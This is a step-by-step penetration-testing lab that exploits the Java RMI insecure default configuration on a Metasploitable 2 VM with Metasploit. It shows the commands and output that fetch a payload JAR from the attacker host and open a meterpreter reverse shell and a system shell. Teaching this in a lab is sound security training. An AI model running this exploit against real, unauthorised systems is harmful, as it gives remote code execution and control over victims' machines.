Java RMI Server Insecure Default Configuration RCE Vulnerability
Java RMI Server Insecure Default Configuration RCE Vulnerability
Note: these labs are extremely oriented to the results, using a step-by-step guidance. During your progress, try to find more information and understand what you are doing.
Requirements
Kali Linux
The Kali Linux VM (or any other type of installation)
Metaploitable 2
The Metasploitable 2 VM
Metasploitable Framework
Metasploit Framework toolset (installed on Kali Linux by default)
Metasploitable 2 IP
The IP address of the Metasploitable 2 VM. In my case it is 192.168.8.142. This may be different in your specific case.
Kali Linux IP
The IP address of the Kali Linux machine. In my case it is 192.168.8.147. This may be different in your specific case.
Laboratory Workflow
The following describe the different steps to be conducted during the laboratory. You may introduce variations on this and learn from those variations.
1. Launch the Metasploit Framework
msfconsole
2. Search for the appropriate module
search java_rmi
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/gather/java_rmi_registry normal No Java RMI Registry Interfaces Enumeration
1 exploit/multi/misc/java_rmi_server 2011-10-15 excellent Yes Java RMI Server Insecure Default Configuration Java Code Execution
2 auxiliary/scanner/misc/java_rmi_server 2011-10-15 normal No Java RMI Server Insecure Endpoint Code Execution Scanner
3 exploit/multi/browser/java_rmi_connection_impl 2010-03-31 excellent No Java RMIConnectionImpl Deserialization Privilege Escalationhelp
3. Use the module
use exploit/multi/misc/java_rmi_server
4. Check the module options
options
Module options (exploit/multi/misc/java_rmi_server):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 yes Time that the HTTP Server will wait for the payload request
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 1099 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.8.147 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Generic (Java Payload)
5. Set the appropriate options
set RHOSTS 192.168.8.142
RHOSTS => 192.168.8.142
6. Run the exploit
exploit
[*] Started reverse TCP handler on 192.168.8.147:4444
[*] 192.168.8.142:1099 - Using URL: http://192.168.8.147:8080/UU6tSf5LVRd
[*] 192.168.8.142:1099 - Server started.
[*] 192.168.8.142:1099 - Sending RMI Header...
[*] 192.168.8.142:1099 - Sending RMI Call...
[*] 192.168.8.142:1099 - Replied to request for payload JAR
[*] Sending stage (58829 bytes) to 192.168.8.142
[*] Meterpreter session 3 opened (192.168.8.147:4444 -> 192.168.8.142:47995) at 2023-03-28 10:05:18 -0400
meterpreter >
7. Meterpreter session
Now you have a meterpreter session opened. This session will allow you to interact with the target.
meterpreter >
Look at the meterpreter help and check the possibilities.
help
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bg Alias for background
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
detach Detach the meterpreter session (for http/https)
disable_unic Disables encoding of unicode strings
ode_encoding
enable_unico Enables encoding of unicode strings
de_encoding
exit Terminate the meterpreter session
get_timeouts Get the current session timeout values
guid Get the session GUID
help Help menu
info Displays information about a Post module
irb Open an interactive Ruby shell on the current session
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
pry Open the Pry debugger on the current session
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
secure (Re)Negotiate TLV packet encryption on the session
sessions Quickly switch to another session
set_timeouts Set the current session timeout values
sleep Force Meterpreter to go quiet, then re-establish session
transport Manage the transport mechanisms
use Deprecated alias for "load"
uuid Get the UUID for the current session
write Writes data to a channel
8. Open a shell on the target machine
shell
meterpreter > shell
Process 1 created.
Channel 1 created.
Video
Video that resumes everything on this laboratory.
Questions
Now that you have completed this exploitation try to answer to following:
Now, what can I do with the exploitation achieved?
Which type of privileges do I have on the exploited target?
